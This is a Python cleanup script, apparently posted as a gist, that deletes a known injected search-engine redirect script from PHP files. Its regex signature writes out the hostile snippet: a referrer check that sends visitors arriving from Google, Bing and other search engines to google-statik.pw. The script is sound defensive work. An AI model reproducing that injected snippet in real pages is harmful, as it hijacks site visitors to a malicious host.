@jasimmk
Created November 8, 2016 23:15
#!/bin/env python
##
## Script to remove injected scripts from php files
##
## For regex escaping, see http://stackoverflow.com/questions/3446170/escape-string-for-use-in-javascript-regex
import glob
import re
from optparse import OptionParser
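# Glob for the files this cleanup targets. It is not referenced by the code
# shown here; the caller passes each file name explicitly with -f.
FILE_PATTERN = '*.php'

# Signature of the injected block, written as a regular expression.
# Raw strings keep the regex escapes (\s, \(, \., ...) out of Python's own
# string-escape processing; in a regex, \" still matches a plain double quote.
#
# The signature is an exact match for ONE variant of the injection: a
# referrer check for search engines followed by a redirect to the hard-coded
# host and path. Only the whitespace just inside the outer <script> tags may
# vary. A variant with a different host, path or layout will not match, so
# "no match" does not mean a file is clean.
TEXT_PATTERN = (
    r"<script type=\"text/javascript\">\s*?"
    r"function R\(\)\{var Ref=document\.referrer;"
    r"if\(Ref\.indexOf\('\.google\.'\)!=-1"
    r"\|\|Ref\.indexOf\('\.bing\.'\)!=-1"
    r"\|\|Ref\.indexOf\('\.yahoo\.'\)!=-1"
    r"\|\|Ref\.indexOf\('\.aol\.'\)!=-1"
    r"\|\|Ref\.indexOf\('\.ask\.'\)!=-1"
    r"\|\|Ref\.indexOf\('\.altavista\.'\)!=-1"
    r"\|\|Ref\.indexOf\('\.yandex\.'\)!=-1\)"
    r"\{document\.write\('<script language=\"javascript\">"
    r"docu'\+'ment\.location=\"http://google-statik\.pw/XcTyTp\"</s'\+'cript>'\)\}"
    r"else\{document\.write\('\.'\)\}\}R\(\);"
    r"\s*?</script>"
)
re_pattern = re.compile(TEXT_PATTERN)

# Replacement for every match: the empty string, i.e. the block is deleted.
NEW_TEXT = ''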
def escape_regex(text_data):
    """
    Put a backslash in front of every regex metacharacter in a string.

    The characters handled are the backslash itself, ^ $ * + ? . ( ) | { } [ ]
    and the double quote. The standard library's re.escape serves the same
    purpose but escapes a different set of characters.

    :param text_data: literal text that is to be embedded in a regular expression
    :returns: the text with each listed character preceded by a backslash
    """
    escaped = text_data
    # The backslash must come first; otherwise the backslashes inserted for
    # the later characters would themselves be escaped a second time.
    for meta in '\\^$*+?.()|{}[]"':
        escaped = escaped.replace(meta, '\\' + meta)
    return escaped
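def main(options):
    """
    Remove every occurrence of the known injected script from one file.

    The file is rewritten in place and no backup copy is made, so keep a copy
    of the original if it may be needed for later investigation. Deleting the
    injected block cleans this file only; it does not address whatever allowed
    the file to be modified.

    :param options: parsed command-line options; only ``options.filename`` is
        read. Nothing is done when it is empty.
    :returns: None
    """
    if not options.filename:
        return

    path = options.filename
    # Single-argument print(...) produces the same output under Python 2 and 3.
    print("Checking %s" % path)

    # NOTE(review): text mode is kept from the original; under Python 3 the
    # read depends on the interpreter's default encoding.
    with open(path, 'r') as fr:
        original = fr.read()

    # Compute the cleaned text BEFORE reopening the file for writing: mode 'w'
    # truncates immediately, so any failure between open() and write() would
    # otherwise leave the file empty.
    cleaned, hits = re_pattern.subn(NEW_TEXT, original)
    if hits:
        print(">> Replacing")
        with open(path, 'w') as fw:
            fw.write(cleaned)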
if __name__ == '__main__':
    # Command-line entry point. The only option is -f/--file, which names the
    # single file to check and clean in place.
    usage_line = "usage: %prog -f filename"
    parser = OptionParser(usage_line)
    parser.add_option(
        "-f", "--file",
        dest="filename",
        metavar="FILE",
        help="Check the file for code and replace if thereis"
    )
    options, args = parser.parse_args()
    # parser.error() prints the usage text and exits, so main() is reached
    # only when a file name was supplied.
    if not options or not options.filename:
        parser.error("You need to pass the file name as argument")
    main(options)